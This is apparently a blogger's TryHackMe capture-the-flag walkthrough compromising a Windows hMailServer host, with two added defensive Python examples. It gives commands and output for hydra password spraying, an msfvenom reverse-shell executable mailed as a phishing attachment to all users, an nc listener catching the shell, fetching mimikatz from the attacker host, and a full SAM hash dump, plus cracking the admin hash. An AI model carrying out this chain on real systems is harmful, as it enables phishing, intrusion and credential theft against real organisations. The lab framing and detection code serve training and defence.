Md. Ibrahim Reza Rabbi

You Got Mail: Compromising a Windows Mail Server | TryHackMe

In this walkthrough, we'll explore how one email password led to a complete mail server compromise.

Nmap command:
sudo nmap -sS -sV -sC -O -Pn -p- --min-rate 1000 -T4 -oA fullscan <target-ip>

The target is a Windows mail server (BRICK-MAIL) running hMailServer with SMTP, POP3, and IMAP services exposed. It also has SMB (445), RDP (3389), and WinRM (5985) open, making those the main services to investigate next.

When I browsed the website https://brownbrick.co/, I noticed this part ->

I listed all the emails and, for the passwords, gathered keywords from the website with the help of "cewl"; after that, with "hydra", I checked the open SMTP server on port 587 to find a legitimate password for someone ->

> ┌──(kali㉿kali)-[~/Try_Hack_Me]
> └─$ cat emails.txt 
> oaurelius@brownbrick.co
> wrohit@brownbrick.co
> lhedvig@brownbrick.co
> tchikondi@brownbrick.co
> pcathrine@brownbrick.co
> fstamatis@brownbrick.co
>                                                                                                                     
> ┌──(kali㉿kali)-[~/Try_Hack_Me]
> └─$ cewl --lowercase https://brownbrick.co/ > passwords.txt
>                                                                                                                     
> ┌──(kali㉿kali)-[~/Try_Hack_Me]
> └─$ hydra -L emails.txt -P passwords.txt 10.49.179.117 smtp -s 587 -t 12
> Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
> Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-06-13 06:28:48
> [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
> [DATA] max 12 tasks per 1 server, overall 12 tasks, 1134 login tries (l:6/p:189), ~95 tries per task
> [DATA] attacking smtp://10.49.179.117:587/
> [587][smtp] host: 10.49.179.117   login: lhedvig@brownbrick.co   password: br***s
> 1 of 1 target successfully completed, 1 valid password found
> Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-06-13 06:29:27
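
A defender's view of the hydra run above, as an added example that is not from the room or the original post: a small detector over constructed log lines in a simplified layout (not hMailServer's actual log format) that flags a source IP failing AUTH against many mailboxes inside a short window and reports whether a login from that IP succeeded afterwards, which is the difference between an attempted spray and a compromised mailbox.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, "<date> <time> <ip> AUTH <OK|FAIL> <user>" per line. Not
# hMailServer's real format; the burst mirrors the hydra run (six mailboxes, one hit).
SAMPLE_LOG = """\
2026-06-13 06:28:48 10.10.14.5 AUTH FAIL oaurelius@brownbrick.co
2026-06-13 06:28:48 10.10.14.5 AUTH FAIL wrohit@brownbrick.co
2026-06-13 06:28:49 10.10.14.5 AUTH FAIL lhedvig@brownbrick.co
2026-06-13 06:28:49 10.10.14.5 AUTH FAIL tchikondi@brownbrick.co
2026-06-13 06:28:50 10.10.14.5 AUTH FAIL pcathrine@brownbrick.co
2026-06-13 06:28:50 10.10.14.5 AUTH FAIL fstamatis@brownbrick.co
2026-06-13 06:28:52 10.10.14.5 AUTH OK   lhedvig@brownbrick.co
2026-06-13 06:30:10 10.10.14.20 AUTH FAIL wrohit@brownbrick.co
2026-06-13 06:45:00 10.10.14.20 AUTH OK   wrohit@brownbrick.co
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) AUTH (OK|FAIL)\s+(\S+)$")

def parse_auth_events(text):
    """Return (timestamp, ip, success, user) tuples sorted by time; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            events.append((ts, m.group(2), m.group(3) == "OK", m.group(4)))
    return sorted(events)

def detect_spray(text, window=timedelta(minutes=5), min_failures=5, min_users=3):
    """Alert on a source IP whose failures inside one sliding window span many distinct
    accounts; any success from that IP after the burst began is listed as 'success_after'."""
    by_ip = defaultdict(list)
    for ev in parse_auth_events(text):
        by_ip[ev[1]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if not e[2]]
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1  # slide the window: drop failures older than `window`
            burst = fails[start:end + 1]
            if len(burst) >= min_failures and len({e[3] for e in burst}) >= min_users:
                first = burst[0][0]
                alerts[ip] = {
                    "failures": len(fails),
                    "users_targeted": len({e[3] for e in fails}),
                    "success_after": sorted({e[3] for e in evs if e[2] and e[0] >= first}),
                }
                break
    return alerts
```

The single failure from 10.10.14.20 followed by a success is a normal typo and never trips the detector; the thresholds are assumptions to tune against real traffic.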


Now, with "lhedvig@brownbrick.co" we can send a phishing mail that makes the other users click or execute our attached malicious file [ which we will get from "msfvenom" (reverse shell for Windows) ], and we notice that the "wrohit" user was the victim ->

> ┌──(kali㉿kali)-[~/Try_Hack_Me]
> └─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.129.81 LPORT=443 -f exe -o shell.exe
> [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
> [-] No arch selected, selecting arch: x64 from the payload
> No encoder specified, outputting raw payload
> Payload size: 460 bytes
> Final size of exe file: 7680 bytes
> Saved as: shell.exe
>                                                                                                    
> ┌──(kali㉿kali)-[~/Try_Hack_Me]
> └─$ for email in $(cat emails.txt); do sendemail -f "lhedvig@brownbrick.co" -t "$email" -u "test" -m "test" -a shell.exe -s 10.49.179.117:25 -xu "lhedvig@brownbrick.co" -xp "bricks"; done
> Jun 13 07:40:38 kali sendemail[5277]: Email was sent successfully!
> Jun 13 07:40:39 kali sendemail[5278]: Email was sent successfully!
> Jun 13 07:40:39 kali sendemail[5279]: Email was sent successfully!
> Jun 13 07:40:40 kali sendemail[5280]: Email was sent successfully!
> Jun 13 07:40:40 kali sendemail[5281]: Email was sent successfully!
> Jun 13 07:40:41 kali sendemail[5282]: Email was sent successfully!
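
On the receiving side, this is the check a mail gateway would apply to the message sent above; it is an added example, not part of the original post or the room. It builds a constructed message of the same shape (sender, subject "test", body "test") with stub attachments, then flags attachments both by extension and by the MZ header that a renamed executable still carries.

```python
import email
from email import policy
from email.message import EmailMessage

# Extensions a gateway would refuse outright; the magic-byte check below also
# catches a PE file that has simply been renamed to dodge this list.
BLOCKED_EXT = (".exe", ".dll", ".scr", ".ps1", ".bat", ".cmd", ".js", ".vbs", ".hta")
MZ = b"MZ"  # every DOS/PE executable starts with these two bytes

def build_sample() -> bytes:
    """Construct a message like the one above. Attachment bytes are a stub with a
    PE-style header, not a real executable."""
    msg = EmailMessage()
    msg["From"] = "lhedvig@brownbrick.co"
    msg["To"] = "wrohit@brownbrick.co"
    msg["Subject"] = "test"
    msg.set_content("test")
    stub = MZ + b"\x90" * 62  # constructed stub, not a working PE
    msg.add_attachment(stub, maintype="application", subtype="octet-stream",
                       filename="shell.exe")
    msg.add_attachment(stub, maintype="application", subtype="pdf",
                       filename="report.pdf")  # renamed: the extension lies
    msg.add_attachment("meeting notes", filename="notes.txt")  # benign
    return msg.as_bytes()

def find_risky_attachments(raw: bytes):
    """Return [(filename, [reasons])] for attachments that should be blocked."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        data = part.get_payload(decode=True) or b""  # decoded from base64
        reasons = []
        if name.endswith(BLOCKED_EXT):
            reasons.append("blocked extension")
        if data[:2] == MZ:
            reasons.append("PE header (MZ)")
        if reasons:
            findings.append((name, reasons))
    return findings
```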

And on the reverse shell listener port we get this ->

> ┌──(kali㉿kali)-[~/Try_Hack_Me]
> └─$ rlwrap nc -lvnp 443
> listening on [any] 443 ...
> connect to [192.168.129.81] from (UNKNOWN) [10.49.179.117] 49946
> Microsoft Windows [Version 10.0.17763.1821]
> (c) 2018 Microsoft Corporation. All rights reserved.
> C:\Mail\Attachments>whoami
> whoami
> brick-mail\wrohit
> C:\Mail\Attachments>dir
> dir
>  Volume in drive C has no label.
>  Volume Serial Number is A8A4-C362
>  Directory of C:\Mail\Attachments
> 06/13/2026  11:40 AM    <DIR>          .
> 06/13/2026  11:40 AM    <DIR>          ..
> 03/17/2024  06:09 PM               258 exec-mail.ps1
> 06/13/2026  11:40 AM             7,680 shell.exe
>                2 File(s)          7,938 bytes
>                2 Dir(s)  13,990,260,736 bytes free
> C:\Mail\Attachments>dir C:\*flag*.txt /s
> dir C:\*flag*.txt /s
>  Volume in drive C has no label.
>  Volume Serial Number is A8A4-C362
>  Directory of C:\Users\wrohit\Desktop
> 03/11/2024  05:15 AM                25 flag.txt
>                1 File(s)             25 bytes
>      Total Files Listed:
>                1 File(s)             25 bytes
>                0 Dir(s)  13,990,260,736 bytes free
> C:\Mail\Attachments>type C:\Users\wrohit\Desktop\flag.txt
> type C:\Users\wrohit\Desktop\flag.txt
> THM{l1v1n_7h3_*****_****}

And we get the flag.

At this point, since we are a member of the Administrators group, we can simply upload Mimikatz to the machine and use it to dump the hashes from the SAM registry hive as follows:

Host a Python server ->

┌──(kali㉿kali)-[~/Try_Hack_Me]
└─$ wget https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe
--2026-06-13 08:00:57--  https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe
Resolving github.com (github.com)... 20.205.243.166
Connecting to github.com (github.com)|20.205.243.166|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘mimikatz.exe’

mimikatz.exe                 [  <=>                             ] 220.01K   757KB/s    in 0.3s    

2026-06-13 08:00:59 (757 KB/s) - ‘mimikatz.exe’ saved [225288]


┌──(kali㉿kali)-[~/Try_Hack_Me]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.49.179.117 - - [13/Jun/2026 08:02:12] "GET /mimikatz.exe HTTP/1.1" 200 -


And download it from the reverse shell ->

C:\Mail\Attachments>curl http://192.168.129.81:8000/mimikatz.exe -o mimikatz.exe

Then, we searched for the method of dumping the SAM database via mimikatz ->

C:\Mail\Attachments>mimikatz.exe
mimikatz.exe
   .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
  ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
  '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
 mimikatz # privilege::debug
 Privilege '20' OK
 mimikatz # token::elevate
 Token Id  : 0
 User name : 
 SID name  : NT AUTHORITY\SYSTEM
 728 {0;000003e7} 1 D 25319      NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
  -> Impersonated !
  * Process Token : {0;003146ba} 0 D 3995258    BRICK-MAIL\wrohitS-1-5-21-1966530601-3185510712-10604624-1014 (14g,24p) Primary
  * Thread Token  : {0;000003e7} 1 D 4017344    NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
 mimikatz # lsadump::sam
 Domain : BRICK-MAIL
 SysKey : 36c8d26ec0df8b23ce63bcefa6e2d821
 Local SID : S-1-5-21-1966530601-3185510712-10604624
 SAMKey : 6e708461100b4988991ce3b4d8b1784e
 RID  : 000001f4 (500)
 User : Administrator
   Hash NTLM: 2dfe3378335d43f9764e581b856a662a
 Supplemental Credentials:
 * Primary:NTLM-Strong-NTOWF *
     Random Value : 3d527dff081980ff09e87e492cebee23
 * Primary:Kerberos-Newer-Keys *
     Default Salt : EC2AMAZ-QTVAAHMAdministrator
     Default Iterations : 4096
     Credentials
       aes256_hmac       (4096) : 9484aadacd6c5994aed633bf92b6b3db31c57c932d2cd84a7fa635a0b3262806
       aes128_hmac       (4096) : cdda685dd630dd0796e5ddf38e22dce5
       des_cbc_md5       (4096) : 08340db613fb46b5
    OldCredentials
      aes256_hmac       (4096) : 50141e3b3b449512e393a66c32e7f89a131744eef5d8a3f6a8576919a810cda3
       aes128_hmac       (4096) : 0d717b42dbaf77bb7248b4bebf8bb3a6
       des_cbc_md5       (4096) : bc23a20170542f25
     OlderCredentials
       aes256_hmac       (4096) : 3b191b95e0b1fa83077319699194a79c8adea64e36bade3e959ccbbff42ea095
       aes128_hmac       (4096) : 318ecf3e0f6b969a949092706b519548
       des_cbc_md5       (4096) : 97f7bc3ead1f6ed6
 * Packages *
     NTLM-Strong-NTOWF
 * Primary:Kerberos *
     Default Salt : EC2AMAZ-QTVAAHMAdministrator
     Credentials
       des_cbc_md5       : 08340db613fb46b5
     OldCredentials
       des_cbc_md5       : bc23a20170542f25
 RID  : 000001f5 (501)
 User : Guest
 RID  : 000001f7 (503)
 User : DefaultAccount
 RID  : 000001f8 (504)
 User : WDAGUtilityAccount
   Hash NTLM: 58f8e0214224aebc2c5f82fb7cb47ca1
 Supplemental Credentials:
 * Primary:NTLM-Strong-NTOWF *
     Random Value : a1528cd40d99e5dfa9fa0809af998696
 * Primary:Kerberos-Newer-Keys *
     Default Salt : WDAGUtilityAccount
     Default Iterations : 4096
     Credentials
       aes256_hmac       (4096) : 3ff137e53cac32e3e3857dc89b725fd62ae4eee729c1c5c077e54e5882d8bd55
       aes128_hmac       (4096) : 15ac5054635c97d02c174ee3aa672227
       des_cbc_md5       (4096) : ce9b2cabd55df4ce
 * Packages *
     NTLM-Strong-NTOWF
 * Primary:Kerberos *
     Default Salt : WDAGUtilityAccount
     Credentials
       des_cbc_md5       : ce9b2cabd55df4ce
 RID  : 000003f1 (1009)
 User : fstamatis
   Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4
 Supplemental Credentials:
 * Primary:NTLM-Strong-NTOWF *
     Random Value : 2ac6116566738883775d4c64894922ea
 * Primary:Kerberos-Newer-Keys *
     Default Salt : BRICK-MAILfstamatis
     Default Iterations : 4096
     Credentials
       aes256_hmac       (4096) : b677f117b8f87d99bd2bec0dc2763404eb28d34e173722ec4d663d439b121c6d
       aes128_hmac       (4096) : d96cbd8c143e83959cf98b1b37bc5c08
       des_cbc_md5       (4096) : 017acb2f802a70a2
 * Packages *
     NTLM-Strong-NTOWF
 * Primary:Kerberos *
     Default Salt : BRICK-MAILfstamatis
     Credentials
       des_cbc_md5       : 017acb2f802a70a2
 RID  : 000003f2 (1010)
 User : lhedvig
   Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4
 Supplemental Credentials:
 * Primary:NTLM-Strong-NTOWF *
     Random Value : 9a9fe1153250a8c494ac7290b6e86bec
 * Primary:Kerberos-Newer-Keys *
     Default Salt : BRICK-MAILlhedvig
     Default Iterations : 4096
     Credentials
       aes256_hmac       (4096) : 9cc3c27c2b6a7a6bfdcf4c9790aee0bd3012f337a8c452a0a5321ee6673c663b
       aes128_hmac       (4096) : 9d9bc45f622cf03fe08b86bd9ef45e5a
       des_cbc_md5       (4096) : d96770bce3ba327a
 * Packages *
     NTLM-Strong-NTOWF
 * Primary:Kerberos *
     Default Salt : BRICK-MAILlhedvig
     Credentials
       des_cbc_md5       : d96770bce3ba327a
 RID  : 000003f3 (1011)
 User : oaurelius
   Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4
 Supplemental Credentials:
 * Primary:NTLM-Strong-NTOWF *
     Random Value : bb03e2de24b406b050d5c4b110de5d94
 * Primary:Kerberos-Newer-Keys *
     Default Salt : BRICK-MAILoaurelius
     Default Iterations : 4096
     Credentials
       aes256_hmac       (4096) : 4e4d369c51fe79b5fa9cd372a6e2983b3d30ae43f7990701548775d087106532
       aes128_hmac       (4096) : ed9ae473c2213b7994c94e800cdb05ca
       des_cbc_md5       (4096) : 3167266bd54c3191
 * Packages *
     NTLM-Strong-NTOWF
 * Primary:Kerberos *
     Default Salt : BRICK-MAILoaurelius
     Credentials
       des_cbc_md5       : 3167266bd54c3191
 RID  : 000003f4 (1012)
 User : pcathrine
   Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4
 Supplemental Credentials:
 * Primary:NTLM-Strong-NTOWF *
     Random Value : e52951c39856ffc37c81c2df09ccad3c
 * Primary:Kerberos-Newer-Keys *
     Default Salt : BRICK-MAILpcathrine
     Default Iterations : 4096
     Credentials
       aes256_hmac       (4096) : ea10cad59f29a9c8daf61992e574781a095d9e4c6443da8170a7c07c051eda59
       aes128_hmac       (4096) : 93005a1203c24a41c9a05beee9662d13
       des_cbc_md5       (4096) : ae701fec345b3b8c
 * Packages *
     NTLM-Strong-NTOWF
 * Primary:Kerberos *
     Default Salt : BRICK-MAILpcathrine
     Credentials
       des_cbc_md5       : ae701fec345b3b8c
 RID  : 000003f5 (1013)
 User : tchikondi
   Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4
 Supplemental Credentials:
 * Primary:NTLM-Strong-NTOWF *
     Random Value : 5588ad299d776483b44417c0bd88861a
 * Primary:Kerberos-Newer-Keys *
     Default Salt : BRICK-MAILtchikondi
     Default Iterations : 4096
     Credentials
       aes256_hmac       (4096) : eaa49b1593bb2c8240611ead9100002a3c520fcbfd103629da20046e5f093b10
       aes128_hmac       (4096) : ef093a7d07ae03cedfbe3098a7376706
       des_cbc_md5       (4096) : 6bab43253e6b4aa1
 * Packages *
     NTLM-Strong-NTOWF
 * Primary:Kerberos *
     Default Salt : BRICK-MAILtchikondi
     Credentials
       des_cbc_md5       : 6bab43253e6b4aa1
 RID  : 000003f6 (1014)
 User : wrohit
   Hash NTLM: 8458995f1d0a4b0c107fb8**********
 Supplemental Credentials:
 * Primary:NTLM-Strong-NTOWF *
     Random Value : 5e0d9f81c0780c189099b7758d79a2e6
 * Primary:Kerberos-Newer-Keys *
     Default Salt : BRICK-MAILwrohit
     Default Iterations : 4096
     Credentials
       aes256_hmac       (4096) : 06cf703200c4fcd6ffaca428e96f18e5063dbb956c58aa7edee5b5acd7817b64
       aes128_hmac       (4096) : 8976fef34b9b36fea80c2d65c764ec5e
       des_cbc_md5       (4096) : 192558b67f7983a4
     OldCredentials
       aes256_hmac       (4096) : 227b60e30b0f1b929da7a0022c56de98121b6b8c151061be8f3923b823b6a85a
       aes128_hmac       (4096) : 82b5027730dd8a73890e09ea65cec047
       des_cbc_md5       (4096) : 13adae677067f7e9
 * Packages *
     NTLM-Strong-NTOWF
 * Primary:Kerberos *
     Default Salt : BRICK-MAILwrohit
     Credentials
       des_cbc_md5       : 192558b67f7983a4
     OldCredentials
       des_cbc_md5       : 13adae677067f7e9

And we get the NTLM hash of "wrohit" ->
User : wrohit Hash NTLM: 8458995f1d0a4b0c107fb8**********

Lastly, we are tasked with finding the password for the hMailServer Administrator Dashboard.

C:\Mail\Attachments>dir C:\*hMailServer*  /s
dir C:\*hMailServer*  /s
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Program Files (x86)

01/29/2024  05:45 AM    <DIR>          hMailServer
               0 File(s)              0 bytes

 Directory of C:\Program Files (x86)\hMailServer\Addons\DataDirectorySynchronizer

10/03/2021  08:12 AM           176,128 Interop.hMailServer.dll
               1 File(s)        176,128 bytes

 Directory of C:\Program Files (x86)\hMailServer\Bin

10/03/2021  08:12 AM         4,636,672 hMailServer.exe
02/25/2024  11:15 PM               604 hMailServer.INI
10/03/2021  08:12 AM            19,456 hMailServer.Minidump.exe
10/03/2021  08:09 AM           163,976 hMailServer.tlb
10/03/2021  08:12 AM           176,128 Interop.hMailServer.dll
               5 File(s)      4,996,836 bytes

 Directory of C:\Program Files (x86)\hMailServer\Database

06/17/2026  06:45 AM           675,840 hMailServer.sdf
               1 File(s)        675,840 bytes

 Directory of C:\ProgramData\Microsoft\Windows\Start Menu\Programs

01/29/2024  05:45 AM    <DIR>          hMailServer
               0 File(s)              0 bytes

 Directory of C:\ProgramData\Microsoft\Windows\Start Menu\Programs\hMailServer

01/29/2024  05:45 AM             1,175 hMailServer Administrator.lnk
01/29/2024  05:45 AM             1,158 hMailServer Database Setup.lnk
               2 File(s)          2,333 bytes

 Directory of C:\ProgramData\Microsoft\Windows\Start Menu\Programs\hMailServer\Installation

01/29/2024  05:45 AM             1,077 Uninstall hMailServer.lnk
               1 File(s)          1,077 bytes

 Directory of C:\Users\Administrator\AppData\Local\Halvar Information

01/29/2024  05:42 AM    <DIR>          hMailServer
               0 File(s)              0 bytes

 Directory of C:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100

03/28/2024  04:04 AM            37,014 {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_hMailServer_Addons_DataDirectorySynchronizer_DataDirectorySynchronizer_exe
03/28/2024  04:04 AM            37,014 {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_hMailServer_Bin_DBSetup_exe
03/28/2024  04:04 AM            37,014 {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_hMailServer_Bin_hMailAdmin_exe
03/28/2024  04:04 AM            37,014 {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_hMailServer_unins000_exe
               4 File(s)        148,056 bytes

 Directory of C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent

02/25/2024  11:15 PM             1,009 hMailServer.lnk
               1 File(s)          1,009 bytes

 Directory of C:\Users\All Users\Microsoft\Windows\Start Menu\Programs

01/29/2024  05:45 AM    <DIR>          hMailServer
               0 File(s)              0 bytes

 Directory of C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\hMailServer

01/29/2024  05:45 AM             1,175 hMailServer Administrator.lnk
01/29/2024  05:45 AM             1,158 hMailServer Database Setup.lnk
               2 File(s)          2,333 bytes

 Directory of C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\hMailServer\Installation

01/29/2024  05:45 AM             1,077 Uninstall hMailServer.lnk
               1 File(s)          1,077 bytes


I gave this terminal directory output to the AI and asked about the best place to get that type of info from, and the AI said ->

And we got the Administrator's Password ->

Decode that hash in CrackStation and you will get the password :)
